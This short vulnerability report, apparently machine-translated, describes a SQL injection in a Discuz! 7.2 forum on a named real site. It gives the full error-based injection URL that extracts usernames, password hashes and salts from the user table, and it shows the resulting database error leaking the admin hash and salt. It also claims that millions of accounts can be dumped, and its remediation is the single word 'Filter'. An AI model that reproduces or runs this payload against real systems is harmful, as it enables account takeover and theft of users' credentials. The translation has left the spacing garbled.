SQL injection vulnerability in a sub-station of superstar Network

SQL injection vulnerability in a sub-station of superstar Network

SQL injection vulnerability in a sub-station of superstar Network

Vulnerability address: club.chaoxing.com/bbs's early injection of dz7.2
Http://club.chaoxing.com/bbs/faq.php? Action = grouppermission & gids [99] = % 27 & gids [100] [0] = % 29% 20and % 20% 28 select % 202% 20 from % 20% 28 select % 20 count % 28 * % 29, concat % 28% 28 select % 20 concat % 28 username, 0x3a, password, 0x3a, salt % 29% 20 from % 20uc_members % 20 limit %, 1% 29, floor % 28 rand % 280% 29*2% 29% 29x % 20 from % 20information_schema.tables % 20 group % 20by % 20x % 29a % 29% 23
Discuz! Info: MySQL Query Error
Time: am
Script:/bbs/faq. php
SQL: SELECT * FROM [Table] usergroups u LEFT JOIN [Table] admingroups a ON u. groupid =. admingid WHERE u. groupid IN ('7', '\', ') and (select 2 from (select count (*), concat (select concat (username, 0x3a, password, 0x3a, salt) from uc_members limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) )#')
Error: Duplicate entry 'admin: b1649ebd2df3aa808b7fdd7b1dd6a93d: 3225521 'for key' group _ key'
Errno.: 1062
Similar error report has been dispatched to administrator before.
Find a solution for this error in the http://faq.comsenz.com
The admin password has been issued, and many other sensitive information can be exposed. You can obtain the account password of 30 million users through traversal.
 

Solution:

Filter